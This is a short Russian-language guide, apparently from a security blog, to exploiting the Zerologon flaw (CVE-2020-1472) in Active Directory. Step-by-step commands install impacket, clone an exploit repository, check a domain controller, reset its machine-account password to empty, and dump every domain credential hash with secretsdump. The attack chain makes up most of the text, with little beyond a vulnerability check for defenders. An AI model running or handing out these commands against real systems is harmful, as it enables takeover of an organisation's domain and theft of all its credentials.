
Скрипты для тестирования и эксплуатации уязвимости Zerologon (CVE-2020-1472) в Active Directory, позволяющие сброс пароля и дамп хэшей контроллеров домена.
Набор скриптов для тестирования и эксплуатации уязвимости Zerologon (CVE-2020-1472)
ZeroLogon — это уязвимость, которая позволяет нам эксплуатировать криптографическую ошибку в протоколе удаленного входа в систему Netlogon (MS-NRPC) Microsoft Active Directory, который позволяет пользователям входить на серверы с использованием NTLM.
Перед выполнением эксплойта мы должны знать, что нам нужна другая версия impacket, для этого мы сделаем следующее.
apt remove --purge impacket-scripts python3-impacket
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
git clone https://github.com/Nekoox/zerologon.git
cd zerologon
pip install -r requirements.txt
python3 tester.py <DC-NAME> <ip-address>
В случае, если целевой контроллер домена уязвим, появится сообщение «Success! DC can be fully compromised by a Zerologon attack.»
В противном случае, то есть если целевой контроллер домена не уязвим, так как дыра в безопасности была исправлена, мы получим следующее сообщение «Attack failed. Target is probably patched.»
python3 empty_pw.py <DC-NAME> <ip-address>
Если контроллер домена уязвим, после запуска эксплойта у него не должно быть пароля.
> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>
Выполнив это, мы сможем увидеть все хэши домена без каких-либо учетных данных.